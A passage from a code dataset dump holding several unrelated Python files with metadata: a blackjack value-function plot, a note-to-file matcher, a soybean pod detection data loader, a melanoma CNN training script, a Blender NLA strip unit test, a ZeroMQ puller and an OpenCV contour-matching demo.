"call"}, {"api_name": "pylab.axis", "line_number": 545, "usage_type": "call"}, {"api_name": "pylab.gca", "line_number": 546, "usage_type": "call"}, {"api_name": "pylab.savefig", "line_number": 547, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 557, "usage_type": "call"}]} +{"seq_id": "10140061442", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter, MultipleLocator\n\ndef plot(val, name=None):\n nx, ny = 10, 31\n x = range(nx)\n for i in range(4):\n y = range(-30,ny)\n hf = plt.figure()\n ha = hf.add_subplot(111, projection='3d')\n plt.xticks(x, range(1,nx+1))\n plt.xlabel('Dealer Card')\n plt.ylabel('Player Sum')\n ha.set_zlabel('Value Function')\n # ha.yaxis.set_major_locator(ticker.MultipleLocator(5))\n X, Y = np.meshgrid(x, y) \n # ha.plot_wireframe(X, Y, val[i,0:ny+10*i,:], color='black')\n # ha.plot_surface(X, Y, val[i,0:ny+10*i,:],cmap=cm.coolwarm)\n Z = val[:,i,:]\n ha.plot_wireframe(X, Y, Z, color='black')\n ha.plot_surface(X, Y, Z,cmap=cm.coolwarm)\n ha.set_title('Surface plot for Trump cards = ' + str(i));\n ha.view_init(elev=25, azim=-7)\n if name:\n hf.savefig(name+'-'+str(i)+'.png')\n if not name:\n plt.show()\n\n# import matplotlib.pyplot as plt\n# from matplotlib import cm\n# from matplotlib.ticker import LinearLocator, FormatStrFormatter\n\n# fig = plt.figure()\n# ax = fig.gca(projection='3d')\n\n# # Make data.\n# X = np.arange(-30, 31, 1)\n# Y = np.arange(0, 10, 1)\n# Y, X = np.meshgrid(Y, X)\n# # R = np.sqrt(X**2 + Y**2)\n# # Z = np.sin(R)\n# Z = v[:,3,:]\n\n# # Plot the surface.\n# # surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,linewidth=0, antialiased=False)\n# surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1,cmap='viridis', edgecolor='none')\n# # ax.view_init(elev=25, azim=-7)\n\n# # Customize the z axis.\n# ax.set_zlim(-1, 1)\n# ax.zaxis.set_major_locator(LinearLocator(10))\n# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n# # Add a color bar which maps values to colors.\n# fig.colorbar(surf, shrink=0.5, aspect=5)\n\n# plt.show()", "repo_name": "samarthaggarwal/BlackJack-CardGame", "sub_path": "plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 1932, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.cm.coolwarm", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "20003998287", "text": "import sys\nimport os\nimport plac\nfrom pathlib import Path\nimport yaml\nimport pandas as pd\n\nsys.path.append('/home/jeremy/Library')\n\nfrom storage.cherrytree_xml import CherryTree\nfrom utility.config import load_config\n\ndef main(config, output='csv'):\n \"\"\"Match files in target directory with nodes containing file link\n config fields: content_index, content_base_name, content_file_dir\n output: html or csv\n \"\"\"\n try:\n c = load_config(config)\n except:\n exit()\n cpath = Path(config).with_suffix('.yaml')\n if not cpath.exists():\n print('no config file found')\n exit()\n cf = yaml.load(cpath.read_text())\n\n ct = CherryTree(cf['content_index'])\n\n cbn = cf['content_base_name']\n cfd = cf['content_file_dir']\n\n content_base_node = ct.find_node_by_name(cbn)\n\n if not content_base_node:\n print(f' {content_base_name} not in index')\n exit()\n\n file_links = set([l.filepath.stem \\\n for n in content_base_node.descendants \\\n for l in n.links \\\n if l.filepath\n if cfd in str(l.filepath)\n ])\n\n file_paths = set([f.stem \\\n for f in Path(cfd).iterdir() \\\n if f.suffix == '.md'])\n\n unmatched = [(f, None) for f in file_paths.difference(file_links)]\n unmatched.extend([(None, l) for l in file_links.difference(file_paths)])\n\n\n df = pd.DataFrame(unmatched, columns=['File', 'Link']).drop_duplicates().sort_values(['Link', 'File'])\n\n\n if output == 'csv':\n print(df.to_csv(sep=' ', index=False, header=False))\n\n elif output == 'html':\n print(df.to_html())\n else:\n print(f'unknown format {output}')\n\n\nif __name__ == '__main__':\n plac.call(main)\n", "repo_name": "jallanxjallan/scripts", "sub_path": "match_nodes_and_files.py", "file_name": "match_nodes_and_files.py", "file_ext": "py", "file_size_in_byte": 1762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "utility.config.load_config", "line_number": 19, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 26, "usage_type": "call"}, {"api_name": "storage.cherrytree_xml.CherryTree", "line_number": 28, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "plac.call", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "17777482603", "text": "# General imports\nimport os\nimport datetime\nimport numpy as np\nimport random\nimport json\n\nimport yaml\nimport cv2\nfrom PIL import Image\nimport argparse\nimport pathlib as pt\nimport re\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n# Importing support packages\nimport pandas as pd\nfrom skimage import io, transform\n\nimport torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Importing torch vision model\nimport torchvision\nimport torchvision.models as models\nfrom torchvision import transforms, utils\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n\npod_data_path = pt.Path(r'D:\\Machine Learning\\Challenge\\SoyBeanPodCount\\Data\\Dev_Phase\\training\\pod_annotations')\n\npod_annotations = pod_data_path / r'pod_detection_annotations.csv'\npod_dataset = pod_data_path / 'dataset'\n\n# Hardcoded variables\ndisplay_limit = 5\n\n\nclass SoyPodDataset(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, csv_file, root_dir, transform_d=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.soypod_frame = pd.read_csv(csv_file)\n self.root_dir = pt.Path(root_dir)\n self.transform = transform_d\n\n def __len__(self):\n return len(self.soypod_frame)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = self.root_dir / self.soypod_frame['filename'][idx]\n image = io.imread(img_name)\n bounds_str = self.soypod_frame['region_shape_attributes'][idx].replace('\"\"', '\"')\n label_data = re.sub(r'\\W', '', self.soypod_frame['region_attributes'][idx])\n bounds = json.loads(bounds_str)\n sample = {'image': image, 'label': label_data}\n sample.update(bounds)\n\n if self.transform:\n sample = self.transform(sample)\n return sample\n\n\nsoy_dataset = SoyPodDataset(csv_file=pod_annotations, root_dir=pod_dataset, transform_d=None)\n\nfig = plt.figure()\n\nfor i in range(len(soy_dataset)):\n sample = soy_dataset[i]\n\n rect = patches.Rectangle((sample['x'], sample['y']), sample['width'], sample['height'], linewidth=1, edgecolor='r',\n facecolor='none')\n ax = plt.subplot(1, display_limit, i + 1)\n plt.tight_layout()\n ax.set_title(f\"Sample #{i + 1}\\n Label: {sample['label']}\")\n ax.axis('off')\n ax.imshow(sample['image'])\n ax.add_patch(rect)\n\n if i == display_limit-1:\n plt.show()\n break\n\nmodel = torchvision.models.detection.fasterrcnn_resnet50_fpn(weights=\"DEFAULT\")\n\ndataloader = DataLoader(soy_dataset, batch_size=4,\n shuffle=True, num_workers=0)\n\n\n# Helper function to show a batch\ndef show_landmarks_batch(sample_batched):\n \"\"\"Show image with landmarks for a batch of samples.\"\"\"\n images_batch, soy_batch = \\\n sample_batched['image'], sample_batched['label']\n x, y, w, h = sample_batched['x'],sample_batched['y'], sample_batched['width'], sample_batched['height']\n batch_size = len(images_batch)\n im_size = images_batch.size(2)\n grid_border_size = 2\n\n grid = utils.make_grid(images_batch)\n plt.imshow(grid)\n\n # for i in range(batch_size):\n # rect = patches.Rectangle((sample['x'], sample['y']), sample['width'], sample['height'], linewidth=1,\n # edgecolor='r',\n # facecolor='none')\n\n plt.title('Batch from dataloader')\n\n\nfor i_batch, sample_batched in enumerate(dataloader):\n # print(i_batch, sample_batched['image'].size())\n\n # observe 4th batch and stop.\n if i_batch == 3:\n plt.figure()\n show_landmarks_batch(sample_batched)\n plt.axis('off')\n plt.ioff()\n plt.show()\n break\n", "repo_name": "jiztom/SoyBeanPodCount", "sub_path": "Test/Dataloader.py", "file_name": "Dataloader.py", "file_ext": "py", "file_size_in_byte": 4022, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 42, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 53, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 65, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 65, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 67, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "torchvision.models.detection.fasterrcnn_resnet50_fpn", "line_number": 97, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.utils.make_grid", "line_number": 113, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ioff", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}]} +{"seq_id": "42269924597", "text": "\"\"\"Conv Nets training script.\"\"\"\nimport click\nimport yaml\nimport pickle as pkl\n\nimport sys\nsys.path.insert(0, 'src/utils/')\nsys.path.insert(0, 'src/configs/')\n\nimport data\nimport util\nimport nn\n\nimport numpy as np\nnp.random.seed(9)\n\n@click.command()\n@click.option('--cnf', default='configs/vgg_224.py', show_default=True,\n help='Path or name of configuration module.')\n@click.option('--weights_from', default=None, show_default=True,\n help='Path to initial weights file.')\n@click.option('--exp_run_folder', default=None, show_default=True,\n help=\"Path to running experiment folder.\")\n@click.option('--train_retina', default=None, show_default=True,\n help=\"Flag to train retina.\")\n@click.option('--fold', default='1x1', show_default=True,\n help=\"Specify the step of the 5x2-fold cross-validation (ex.: 1x1, 1x2, ..., 5x2).\")\n\ndef main(cnf, weights_from, fold, exp_run_folder, train_retina):\n config = util.load_module(cnf).config\n config.cnf['fold'] = fold # <-- used to change the directories for weights_best, weights_epoch and weights_final\n config.cnf['exp_run_folder'] = exp_run_folder\n protocol = data.settings['protocol']\n\n if train_retina != 'train_retina':\n folds = yaml.load(open('folds/'+protocol+'.yml'))\n f0, f1 = fold.split('x')\n train_list = folds['Fold_' + f0][int(f1)-1]\n files = data.get_image_files(config.get('train_dir'), train_list)\n else:\n files = data.get_image_files(config.get('train_dir'))\n\n if weights_from is None:\n weights_from = config.weights_file\n else:\n weights_from = str(weights_from)\n\n names = data.get_names(files)\n labels = data.get_labels(names, label_file='folds/'+protocol+'.csv').astype(np.int32)\n net = nn.create_net(config)\n\n try:\n net.load_params_from(weights_from)\n print(\"loaded weights from {}\".format(weights_from))\n except IOError:\n print(\"couldn't load weights, starting from scratch\")\n\n\n #Print layerinfo\n print(\"## Layer information\")\n import nolearn\n layer_info = nolearn.lasagne.PrintLayerInfo()\n print(layer_info._get_greeting(net))\n layer_info, legend = layer_info._get_layer_info_conv(net)\n print(layer_info)\n print(legend)\n print(\"fitting ...\")\n net.fit(files, labels)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "learningtitans/melanoma-transfer", "sub_path": "src/train_nn.py", "file_name": "train_nn.py", "file_ext": "py", "file_size_in_byte": 2397, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "util.load_module", "line_number": 30, "usage_type": "call"}, {"api_name": "data.settings", "line_number": 33, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 36, "usage_type": "call"}, {"api_name": "data.get_image_files", "line_number": 39, "usage_type": "call"}, {"api_name": "data.get_image_files", "line_number": 41, "usage_type": "call"}, {"api_name": "data.get_names", "line_number": 48, "usage_type": "call"}, {"api_name": "data.get_labels", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "nn.create_net", "line_number": 50, "usage_type": "call"}, {"api_name": "nolearn.lasagne.PrintLayerInfo", "line_number": 62, "usage_type": "call"}, {"api_name": "nolearn.lasagne", "line_number": 62, "usage_type": "attribute"}, {"api_name": "click.command", "line_number": 17, "usage_type": "call"}, {"api_name": "click.option", "line_number": 18, "usage_type": "call"}, {"api_name": "click.option", "line_number": 20, "usage_type": "call"}, {"api_name": "click.option", "line_number": 22, "usage_type": "call"}, {"api_name": "click.option", "line_number": 24, "usage_type": "call"}, {"api_name": "click.option", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "15879171119", "text": "import bpy\nimport sys\nimport unittest\n\n\nclass AbstractNlaStripTest(unittest.TestCase):\n \"\"\" Sets up a series of strips in one NLA track. \"\"\"\n\n test_object: bpy.types.Object = None\n \"\"\" Object whose X Location is animated to check strip evaluation. \"\"\"\n\n nla_tracks: bpy.types.NlaTracks = None\n \"\"\" NLA tracks of the test object, which are cleared after each test case. \"\"\"\n\n action: bpy.types.Action = None\n \"\"\" Action with X Location keyed on frames 1 to 4 with the same value as the frame, with constant interpolation. \"\"\"\n\n @classmethod\n def setUpClass(cls):\n bpy.ops.wm.read_factory_settings(use_empty=True)\n\n cls.test_object = bpy.data.objects.new(name=\"Object\", object_data=bpy.data.meshes.new(\"Mesh\"))\n bpy.context.collection.objects.link(cls.test_object)\n cls.test_object.animation_data_create()\n\n cls.nla_tracks = cls.test_object.animation_data.nla_tracks\n\n cls.action = bpy.data.actions.new(name=\"ObjectAction\")\n x_location_fcurve = cls.action.fcurves.new(data_path=\"location\", index=0, action_group=\"Object Transforms\")\n for frame in range(1, 5):\n x_location_fcurve.keyframe_points.insert(frame, value=frame).interpolation = \"CONSTANT\"\n\n def tearDown(self):\n while len(self.nla_tracks):\n self.nla_tracks.remove(self.nla_tracks[0])\n\n def add_strip_no_extrapolation(self, nla_track: bpy.types.NlaTrack, start: int) -> bpy.types.NlaStrip:\n \"\"\" Places a new strip with the test action on the given track, setting extrapolation to nothing. \"\"\"\n strip = nla_track.strips.new(\"ObjectAction\", start, self.action)\n strip.extrapolation = \"NOTHING\"\n return strip\n\n def assertFrameValue(self, frame: float, expected_value: float):\n \"\"\" Checks the evaluated X Location at the given frame. \"\"\"\n int_frame, subframe = divmod(frame, 1)\n bpy.context.scene.frame_set(frame=int(int_frame), subframe=subframe)\n self.assertEqual(expected_value, self.test_object.evaluated_get(\n bpy.context.evaluated_depsgraph_get()\n ).matrix_world.translation[0])\n\n\nclass NlaStripSingleTest(AbstractNlaStripTest):\n \"\"\" Tests the inner values as well as the boundaries of one strip on one track. \"\"\"\n\n def test_extrapolation_nothing(self):\n \"\"\" Tests one strip with no extrapolation. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n\n self.assertFrameValue(0.9, 0.0)\n self.assertFrameValue(1.0, 1.0)\n self.assertFrameValue(1.1, 1.0)\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 0.0)\n\n\nclass NlaStripBoundaryTest(AbstractNlaStripTest):\n \"\"\" Tests two strips, the second one starting when the first one ends. \"\"\"\n\n # Incorrectly, the first strip is currently evaluated at the boundary between two adjacent strips (see #113487).\n @unittest.expectedFailure\n def test_adjacent(self):\n \"\"\" The second strip should be evaluated at the boundary between two adjacent strips. \"\"\"\n nla_track = self.nla_tracks.new()\n self.add_strip_no_extrapolation(nla_track, 1)\n self.add_strip_no_extrapolation(nla_track, 4)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 1.0)\n self.assertFrameValue(4.1, 1.0)\n\n def test_adjacent_muted(self):\n \"\"\" The first strip should be evaluated at the boundary if it is adjacent to a muted strip. \"\"\"\n nla_track = self.nla_tracks.new()\n self.add_strip_no_extrapolation(nla_track, 1)\n self.add_strip_no_extrapolation(nla_track, 4).mute = True\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 0.0)\n\n def test_first_above_second(self):\n \"\"\" The first strip should be evaluated at the boundary, when followed by another strip on a track below. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 4)\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 4.0)\n self.assertFrameValue(4.1, 1.0)\n\n def test_second_above_first(self):\n \"\"\" The second strip should be evaluated at the boundary, when preceded by another strip on a track below. \"\"\"\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 1)\n self.add_strip_no_extrapolation(self.nla_tracks.new(), 4)\n\n self.assertFrameValue(3.9, 3.0)\n self.assertFrameValue(4.0, 1.0)\n self.assertFrameValue(4.1, 1.0)\n\n\nif __name__ == \"__main__\":\n # Drop all arguments before \"--\", or everything if the delimiter is absent. Keep the executable path.\n unittest.main(argv=sys.argv[:1] + (sys.argv[sys.argv.index(\"--\") + 1:] if \"--\" in sys.argv else []))\n", "repo_name": "blender/blender", "sub_path": "tests/python/bl_animation_nla_strip.py", "file_name": "bl_animation_nla_strip.py", "file_ext": "py", "file_size_in_byte": 4839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 12, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bpy.ops.wm.read_factory_settings", "line_number": 20, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bpy.data.objects.new", "line_number": 22, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "bpy.data.meshes.new", "line_number": 22, "usage_type": "call"}, {"api_name": "bpy.context.collection.objects.link", "line_number": 23, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 23, "usage_type": "attribute"}, {"api_name": "bpy.data.actions.new", "line_number": 28, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 28, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 37, "usage_type": "attribute"}, {"api_name": "bpy.context.scene.frame_set", "line_number": 46, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 46, "usage_type": "attribute"}, {"api_name": "bpy.context.evaluated_depsgraph_get", "line_number": 48, "usage_type": "call"}, {"api_name": "bpy.context", "line_number": 48, "usage_type": "attribute"}, {"api_name": "unittest.expectedFailure", "line_number": 71, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sys.argv.index", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "6533914819", "text": "import zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.PULL)\nsocket.connect(\"tcp://127.0.0.1:5555\")\n\nwhile True:\n message = socket.poll(100)\n\n if message:\n print(f\"poller: {message}\")\n message = socket.recv()\n print(f\"recv: {message}\")\n else:\n print(\"still waiting\")\n", "repo_name": "karol-brejna-i/locust-experiments", "sub_path": "feeding-locusts/0mq-playground/push-pull/non-blocking-puller.py", "file_name": "non-blocking-puller.py", "file_ext": "py", "file_size_in_byte": 313, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 172, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zmq.Context", "line_number": 3, "usage_type": "call"}, {"api_name": "zmq.PULL", "line_number": 4, "usage_type": "attribute"}]} +{"seq_id": "25622851465", "text": "# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport cv2\n\nimg = None\npoint = None\n\ndef onTrackbarSlide(pos):\n global img, point\n gray = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2GRAY)\n ret, dst = cv2.threshold(gray, int(pos), 255, cv2.THRESH_BINARY)\n contours, hierarchy = cv2.findContours(dst, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n if contours:\n nomal_curves = []\n selected_curve = None\n selected_curve_distance = None\n i1_matched_curves = []\n i2_matched_curves = []\n i3_matched_curves = []\n if point != None:\n for contour in contours:\n if selected_curve_distance == None:\n selected_curve = contour\n selected_curve_distance = cv2.pointPolygonTest(contour, point, True)\n else:\n distance = cv2.pointPolygonTest(contour, point, True)\n if abs(selected_curve_distance) > abs(distance):\n nomal_curves.append(selected_curve)\n selected_curve = contour\n selected_curve_distance = distance\n else:\n nomal_curves.append(contour)\n\n for contour in contours:\n if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I1, 0) < 0.1:\n i1_matched_curves.append(contour)\n if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I2, 0) < 0.1:\n i2_matched_curves.append(contour)\n if cv2.matchShapes(contour, selected_curve, cv2.cv.CV_CONTOURS_MATCH_I3, 0) < 0.1:\n i3_matched_curves.append(contour)\n else:\n nomal_curves = contours\n\n color = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n cv2.drawContours(color, nomal_curves, -1, (0, 0, 0))\n cv2.drawContours(color, [selected_curve], -1, (0, 0, 255))\n cv2.imshow('Contours', color)\n\n i1_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n cv2.drawContours(i1_matched, i1_matched_curves, -1, (0, 0, 255))\n cv2.imshow('I1 Matched', i1_matched)\n\n i2_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n cv2.drawContours(i2_matched, i2_matched_curves, -1, (0, 0, 255))\n cv2.imshow('I2 Matched', i1_matched)\n\n i3_matched = cv2.cvtColor(gray, cv2.COLOR_GRAY2RGB)\n cv2.drawContours(i3_matched, i3_matched_curves, -1, (0, 0, 255))\n cv2.imshow('I3 Matched', i3_matched)\n\ndef onMouse(event, x, y, flags, param):\n global point\n if (event == 4):\n point = (x, y)\n onTrackbarSlide(cv2.getTrackbarPos('Threshold', 'Contours'))\n\ndef main(args):\n global img\n if len(args) != 2:\n return -1\n img = cv2.imread(args[1])\n cv2.namedWindow('Contours')\n cv2.namedWindow('I1 Matched')\n cv2.moveWindow('I1 Matched', img.shape[1], 0)\n cv2.namedWindow('I2 Matched')\n cv2.moveWindow('I2 Matched', img.shape[1] * 2, 0)\n cv2.namedWindow('I3 Matched')\n cv2.moveWindow('I3 Matched', img.shape[1] * 3, 0)\n cv2.createTrackbar('Threshold', 'Contours', 100, 255, onTrackbarSlide)\n cv2.setMouseCallback('Contours', onMouse)\n cv2.imshow('Contours', img)\n\n onTrackbarSlide(0)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n return 0\n\nif __name__ == '__main__':\n args = sys.argv\n main(args)\n", "repo_name": "justice3120/opencv_sample", "sub_path": "8/8-6/3/sample.py", "file_name": "sample.py", "file_ext": "py", "file_size_in_byte": 3392, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.pointPolygonTest", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.pointPolygonTest", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.matchShapes", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cv2.matchShapes", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.matchShapes", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.getTrackbarPos", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.moveWindow", 